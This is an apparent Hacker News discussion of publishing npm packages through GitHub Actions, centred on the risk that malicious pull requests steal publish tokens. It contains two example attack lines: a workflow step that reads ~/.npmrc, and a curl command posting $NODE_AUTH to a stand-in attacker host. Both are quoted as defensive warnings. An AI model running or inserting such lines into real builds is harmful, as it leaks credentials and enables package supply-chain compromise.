Publish NPM Package with GitHub Actions

Publish NPM Package with GitHub Actions(juffalow.com)

47 points by pafo 6 years ago | 28 comments

NathanKP 6 years ago |

Note that you need to be very careful about this if you have a public repository that accepts PR's from third parties. There is nothing stopping someone from adding this via a PR:

    - name: Give me this person's NPM token
      run: cat ~/.npmrc

Even if you have it locked down so they can't see the build output, they could just add a curl command to post the contents of your .npmrc file to their server.

A number of open source projects have been hacked this way in the past. This is why I keep my NPM publish entirely isolated from the Github repo. I review every PR that is submitted to me carefully, but don't want any chance of accidentally merging in a malicious PR that will compromise my NPM packages.

mscccc 6 years ago | |

> With the exception of GITHUB_TOKEN, secrets are not passed to the runner when a workflow is triggered from a forked repository.

https://help.github.com/en/actions/automating-your-workflow-...

NathanKP 6 years ago | | |

Yeah but it only takes accidentally merging in something malicious once to have it running in the main repository now

amenod 6 years ago | |

I like the way GitLab solves this. You mark your secrets ("CI/CD env vars") as protected, then only protected branches and tags can use them. When someone has right to merge or push to a protected branch, thay of course gain access to these vars, but if you don't allow anyone to do this, you are pretty safe.

est31 6 years ago | |

Yes this is a problem in Rust-land too. crates.io doesn't support user tokens to be limited to a crate only [1], but gives access to all the crates an user has access to. So if the token leaks, attackers have access to all your crates. For the cpal crate we worked around the issue by creating a new github user that has only access to the cpal crate (and maybe in the future a few other crates in the same org) but nothing more [2]. This solution isn't really good tho.

[1]: https://github.com/rust-lang/crates.io/issues/849

[2]: https://github.com/RustAudio/cpal/pull/337

robrtsql 6 years ago | |

Does this rely on the `.npmrc` file being cached from a previous run (which will only happen if you use a self-hosted runner)? Or does this vulnerability mean that PR contributors basically have direct access to all of the secrets that you put on your GitHub repo?

NathanKP 6 years ago | | |

Yeah in the authors example they are writing a .npmrc file but it could also just as easily be outputting the env variable of the secret. Fundamentally if NPM can access the secret in the build that means anyone who can modify the build process can also access the secret.

There are so many vectors of vulnerability: from modifying NPM package.json scripts, to modifying makefiles, to modifying the build scripts, etc that I find the only true solution is to have one public repo that accepts PR's from the public and only does checks like linting and running the tests, but does not have any access to secrets for publish. Ideally the public repo also does not contain your actual publish scripts either, only you as the package owner have access to them, as they are stored in your own private repo.

Then have another private repo that you sync into or an external, fully private build system that keeps the secrets, and does the real NPM publish. I think it is just far too dangerous to do the NPM publish from the public facing repo. I assume the author is well aware of this too, but just wanted to include a warning in case anyone else hasn't run into this or thought of it yet.

tracker1 6 years ago | |

absolutely... I think Github should probably put a warning statement on any PRs that include changes to .github/

judge2020 6 years ago | | |

That would be good for the UI, but PRs that modify .github/workflows already never run the checks. I guess they could also modify your npm `scripts` to `cat .npmrc` but that's another issue.

xPaw 6 years ago | |

How would the workflow run if they specify `on: release: types: [published]`?

pafo 6 years ago | |

Thank you for this comment! It is a very good point.

tracker1 6 years ago |

You don't need to write the environment variable to the .npmrc file... just setting the NODE_AUTH token and registry_url parameters. Here's mine...

https://gist.github.com/tracker1/fdd5ceab8f532afc3a05ab9c0bd...

esamatti 6 years ago | |

I think attacker could still do this in a post install script:

curl -d secret=$NODE_AUTH https://attackershost.example/capture_secret

tracker1 6 years ago | | |

fair enough... separating build and publish actions, and using artifacts from one to the other can help limit exposure to just the publish yaml.

Though, one should be very leery of anything that touches certain paths... for the most part, I tent to use scripts/npm/ for anything run from package.json and would also watch out for any changes in .github/

It depends on a bit of due diligence. It's not any different than other CI/CD platforms in any meaningful way.

brianzelip 6 years ago | |

Off topic, but cool, I didn't know npm has a version bump capability. I wrote my own small cli tool[0] for new releases, which could have been even smaller via leveraging the npm builtin. Thanks!

[0] https://github.com/brianzelip/bump

koolba 6 years ago |

Alternatively don’t do anything like this and setup 2FA for your NPM account to prevent malicious publishes in the event of a compromise.

Another pleasant side effect is that 2FA prevents accidental publishes too.

guessmyname 6 years ago |

I am looking forward to be able to publish Go modules too.

• https://golang.org/doc/go1.13#modules

• https://sum.golang.org/

toomuchtodo 6 years ago |

Could something similar be used to publish an artifact to Pypi?

ikornaselur 6 years ago | |

I really like the idea of automating this whole process. While not generic to publishing to pypi, I was playing around with this process in a toy repo I have, where it builds a Rust/Python package, creates a release on Github if I bump the version number, build the package and publishes it on Pypi.

It probably not the cleanest way to do it, but I liked having it "spelled out" in steps manually to play around and learn more about how to do this.

You can see my workflow in the toy repo here: https://github.com/ikornaselur/img-utils/blob/master/.github...

tracker1 6 years ago | | |

since npm version creates a tag, I have an action for v* tags that will build/publish... have migrated a couple projects from travis-ci ... TFA is a bit mixed, you don't need to push to npmrc for this behavior though.

(I did post this link in direct thread, copied here)

https://gist.github.com/tracker1/fdd5ceab8f532afc3a05ab9c0bd...

Latty 6 years ago | |

I am actively doing this for a project of mine: https://github.com/Lattyware/unrpa

I also do a MyPy type check as well with the actions stuff. It's very similar to the GitLab CI stuff, if you have used that.

TotempaaltJ 6 years ago | |

https://github.com/marketplace/actions/pypi-publish seems it exists!

toomuchtodo 6 years ago | | |

Brilliant! Thank you! This will make my life just a tad bit easier for a project I admin.

k__ 6 years ago |

Are GHAs like FaaS for Git?

reilly3000 6 years ago | |

Pretty much yes. Their build running machines are very powerful and loaded with lots of typical libraries. They specifically state that GHA should not be used as a general serverless compute platform in their TOS. I think that needs to be said because its perfectly capable of being a pretty robust FaaS platform in general- but certainly its totally valid to use as FaaS for git or anything that could be GitHub webhook, like PR comments, milestone updates, label creation, etc.